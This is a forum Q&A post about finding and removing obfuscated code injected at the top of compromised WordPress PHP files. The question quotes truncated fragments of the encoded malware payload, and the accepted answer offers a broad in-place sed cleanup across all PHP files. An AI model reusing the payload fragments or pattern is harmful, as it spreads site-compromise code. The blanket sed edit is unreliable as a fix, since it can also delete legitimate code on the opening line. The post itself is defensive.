# Identify compromised PHP files

Tags: php, shell, unix

I'm trying to cleanse some Word Press .php files that have been previously compromised, probably by MySQL code injection.

These files begin like this:

```
<?php$kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x2fvr#  x5cq%7**^#zsfvr#        x5!>>   x22!pd%)!gj}Z;h!opjudovg}{;#)W%c!>!%i   x5c2^<!Ce*[!ode(array_map("opfyigg",str_split("%tjw!>!#]y84]275]y83]248]y83]254ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2jm6<     x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!     x<*)ujojR       x27id%6<        x7fw6*  x7f_*#ujoj;%-qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}
```

Some of them have a space after the opening tag, like:

```
<?php $kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)
```

I can search and replace all opening `<?php` tags but that breaks some legitimate files.

Is there anything unique about this kind of PHP code so it first can be identified, then fixed? I'm not sure how to describe this code...

Comment: How about migrate away from wordpress and never ever use it ever again? Wordpress induces cancer to programmer's world and just like cancer we (the sane folks) still can't cure that parasitizing disease.First step is actually getting rid of it. For good.

Comment: @Nordenheim actually Wordpress is fine after being hardened — I've got a bulletproof setup, but this is an older site inherited from someone else, and my question is a coding one and not an inquiry about alternatives to WP.

Answer (score 2, accepted):

I have generally not seen PHP file with any code after the php start tag. If that is the case and your problem statement is simplified to replace

```
<?php.*$
```

with

```
<?php
```

you can use a sed command command with find like this

```
find -name \*php | xargs sed -i 's/<?php.*$/<?php/'
```

You probably want to back up the files and do some research using grep before going ahead with the sed to replace inplace

Comment: Perfect, Jay, thanks! This is what I ended up using: `find . -type f -name \*php | xargs sed -i '.bak' 's/<?php.*$/<?php/'`